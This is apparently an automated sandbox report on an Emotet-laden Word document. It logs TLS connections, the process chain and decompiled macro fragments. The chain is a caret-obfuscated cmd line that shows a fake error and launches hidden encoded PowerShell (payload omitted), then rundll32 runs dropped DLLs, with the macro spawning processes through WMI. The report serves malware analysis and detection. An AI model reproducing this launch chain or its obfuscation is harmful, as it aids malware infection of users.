                                                                    Jan 26, 2021 06:54:57.119563103 CET | 212.227.200.73 | 443 | 192.168.2.22 | 49169 | CN=*.traumfrauen-ukraine.de | CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Mar 19 01:00:00 CET 2020 | Tue May 18 14:00:00 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
                                                                     |  |  |  |  | CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Mon Nov 27 13:46:10 CET 2017 | Sat Nov 27 13:46:10 CET 2027 |  |
                                                                    Jan 26, 2021 06:54:57.335607052 CET | 192.0.78.20 | 443 | 192.168.2.22 | 49170 | CN=*.wpcomstaging.com | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Sep 29 02:00:00 CEST 2020 | Sun Oct 31 01:59:59 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
                                                                     |  |  |  |  | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031 |  |
                                                                     |  |  |  |  | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029 |  |

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Memory Usage

                                                                    High Level Behavior Distribution

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:06:54:32
                                                                    Start date:26/01/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                    Imagebase:0x13f6c0000
                                                                    File size:1424032 bytes
                                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:06:54:34
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [encoded command omitted]
                                                                    Imagebase:0x4aaa0000
                                                                    File size:345088 bytes
                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:34
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\msg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                                    Imagebase:0xff730000
                                                                    File size:26112 bytes
                                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:35
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -w hidden -enc [encoded command omitted]
                                                                    Imagebase:0x13f720000
                                                                    File size:473600 bytes
                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:06:54:40
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                    Imagebase:0xffa20000
                                                                    File size:45568 bytes
                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:40
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:41
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:42
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:42
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:43
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:44
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:45
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:46
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:47
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:48
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:49
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:06:54:50
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:06:54:51
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:06:54:52
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:06:54:53
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                                                                    Imagebase:0x260000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Module: Gp0t5ucwnkng7fi

                                                                    Declaration
                                                                    Line  Content
                                                                    1     Attribute VB_Name = "Gp0t5ucwnkng7fi"

                                                                    Executed Functions
                                                                    APIs | Meta Information

                                                                    Array

                                                                    AjzpdH

                                                                    Target

                                                                    Split

                                                                    yqmFHJvF

                                                                    jbkkjHHCd

                                                                    Nkemmqfhxex

                                                                    Content

                                                                    Dt5ebejo9lypr_3vmp

                                                                    Array

                                                                    wPuUI

                                                                    Target

                                                                    Split

                                                                    TfZstIBWb

                                                                    QNBiBDJF

                                                                    Array

                                                                    mQUInscCB

                                                                    Target

                                                                    Split

                                                                    NxyDdD

                                                                    PmHbFtBA

                                                                    Array

                                                                    ZcbWFy

                                                                    Target

                                                                    Split

                                                                    uwcdCFcFJ

                                                                    jmprxcAGG

                                                                    Array

                                                                    upIoDlhH

                                                                    Target

                                                                    Split

                                                                    DpdIEHHc

                                                                    BZLGJ

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    Array

                                                                    LFmsHlGJO

                                                                    Target

                                                                    Split

                                                                    DReLBGD

                                                                    VlJBAxsF

                                                                    Array

                                                                    QttEc

                                                                    Target

                                                                    Split

                                                                    ybkwIF

                                                                    sInuFuLII

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl

                                                                    Array

                                                                    JNPIBwzJy

                                                                    Target

                                                                    Split

                                                                    MtSXGFAwF

                                                                    xJhvfW

                                                                    GetObject

                                                                    GetObject("winmgmts:win32_process")

                                                                    Array

                                                                    vXvXQH

                                                                    Target

                                                                    Split

                                                                    AnoeDGEY

                                                                    BBnudDV

                                                                    Mid

                                                                    Len

                                                                    Len([obfuscated command string removed]) -> 37616

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl

                                                                    Array

                                                                    TYMfJE

                                                                    Target

                                                                    Split

                                                                    zzXfBb

                                                                    ppqanE

                                                                    Create

                                                                    SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded PowerShell command removed],,) -> 0

                                                                    S2xsub800b7

                                                                    Tl85j6j2gy2n7qad

                                                                    Array

                                                                    uFHXMGsDH

                                                                    Target

                                                                    Split

                                                                    UupSwG

                                                                    wbcoCJA

                                                                    Strings
                                                                    Decrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db ""ndpns wu db nd"
                                                                    "ns wu db ndrons wu db ndns wu db ndc""ens wu db ndsns wu db ndsns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db nd:wns wu db ndns w""u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "wns wu db ndi""nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    Line | Instruction | Meta Information
                                                                    2

                                                                    Function Xusmagx95iuck_o3o()

                                                                    3

                                                                    Goto snBUla

                                                                    executed
                                                                    4

                                                                    Const AjzpdH as String = "A"

                                                                    5

                                                                    Const jbkkjHHCd as String = ","

                                                                    6

                                                                    Const yqmFHJvF as String = "*high*,*critic*"

                                                                    7

                                                                    Dim FwMLnnSxs as Range

                                                                    7

                                                                    Set FwMLnnSxs = Array((AjzpdH), Target)

                                                                    Array

                                                                    AjzpdH

                                                                    Target

                                                                    8

                                                                    If FwMLnnSxs Is Nothing Then

                                                                    9

                                                                    Endif

                                                                    10

                                                                    Dim rnfVw() as String

                                                                    10

                                                                    rnfVw = Split(yqmFHJvF, jbkkjHHCd)

                                                                    Split

                                                                    yqmFHJvF

                                                                    jbkkjHHCd

                                                                    10

                                                                    snBUla:

                                                                    12

                                                                    skuwd = Nkemmqfhxex + U765y5vgf_ao0faq.Content + Dt5ebejo9lypr_3vmp

                                                                    Nkemmqfhxex

                                                                    Content

                                                                    Dt5ebejo9lypr_3vmp

                                                                    15

                                                                    Goto uUNTnPDJ

                                                                    16

